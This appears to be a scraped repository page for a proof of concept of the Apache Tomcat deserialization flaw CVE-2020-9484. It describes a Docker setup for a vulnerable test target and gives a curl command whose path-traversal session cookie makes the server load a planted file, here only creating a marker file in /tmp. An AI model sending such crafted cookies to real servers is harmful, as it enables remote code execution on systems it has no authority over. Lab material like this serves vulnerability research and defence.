View Code? Open in Web Editor
NEW
This project forked from coldfusionx/cve-2020-9484
POC - Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)
cve-2020-9485's Introduction
Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)
Vulnerable target setup
- Clone this repository
- Run
docker-compose up -d
- That's it !
Exploit POC
- Run
curl -v 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/cfx
- File named
coldfx
gets created in tmp
directory
cve-2020-9485's People
Contributors
Watchers